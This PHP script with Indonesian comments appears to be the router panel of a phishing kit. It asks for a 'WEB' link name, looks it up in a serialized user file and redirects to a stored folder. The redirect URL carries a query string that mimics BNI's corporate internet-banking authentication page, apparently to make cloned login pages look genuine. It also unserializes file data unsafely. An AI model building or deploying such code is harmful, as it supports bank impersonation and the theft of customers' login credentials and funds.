<?php
// Fungsi untuk mendapatkan data pengguna dari file dan mengembalikan array
function getUsersData()
{
    $dataFile = "rxluser.txt";
    if (file_exists($dataFile)) {
        $data = file_get_contents($dataFile);
        return unserialize($data);
    }
    return array();
}

// Proses form login
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $WEB = $_POST["WEB"];
    $users = getUsersData();

    // Periksa apakah WEB ada dalam daftar user
    if (array_key_exists($WEB, $users)) {
    // Tambahkan string ke URL folder sebelum redirect
        $folderName = $users[$WEB] . "?=/corp/AuthenticationController?__START_TRAN_FLAG__=Y&FORMSGROUP_ID__=AuthenticationFG&__EVENT_ID__=LOAD&FG_BUTTONS__=LOAD&ACTION.LOAD=Y&AuthenticationFG.LOGIN_FLAG=1&BANK_ID=BNI01&LANGUAGE_ID";
        header("Location: " . $folderName);
        exit;
    } else {
        $error_message = "Masukan Nama Link Tadi.";
    }
}
?>

<!DOCTYPE html>
<!DOCTYPE html>
<html>
<head>
    <title>Login</title>
    <style>
        /* CSS untuk styling */
        body {
            background-color: #1a1a1a;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            flex-direction: column;
            position: relative;
        }

        .logo-container {
            width: 160px;
            height: 160px;
            border: 1px solid white;
            border-radius: 50%;
            margin-bottom: 20px;
            background: url('https://i.ibb.co/Xp972hr/1714739354934.jpg') no-repeat center center;
            background-size: cover;
        }

        h2 {
            color: white;
            font-size: 24px;
            margin-bottom: 20px;
            position: absolute;
            top: -200px;
        }

        form {
            background-color: rgba(255, 255, 255, 0.2);
            padding: 20px;
            border-radius: 10px;
            display: flex;
            flex-direction: column;
            align-items: center;
            width: 100%;
            max-width: 400px;
            position: relative;
        }

        label {
            color: white;
            font-weight: bold;
            margin-bottom: 10px;
            width: 100%;
        }

        input[type="text"] {
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
            width: 100%;
            max-width: 300px;
            margin-bottom: 10px;
        }

        input[type="submit"] {
            padding: 10px 20px;
            background-color: #337ab7;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #23527c;
        }
    </style>
</head>
<body>
    <div class="logo-container"></div> <!-- Tempat untuk logo -->
    <h2>Login</h2>
    <form method="post" action="">
        <label for="WEB">WEB:</label>
        <input type="text" name="WEB" id="WEB" required><br>
        <input type="submit" value="Login">
    </form>
</body>
</html>
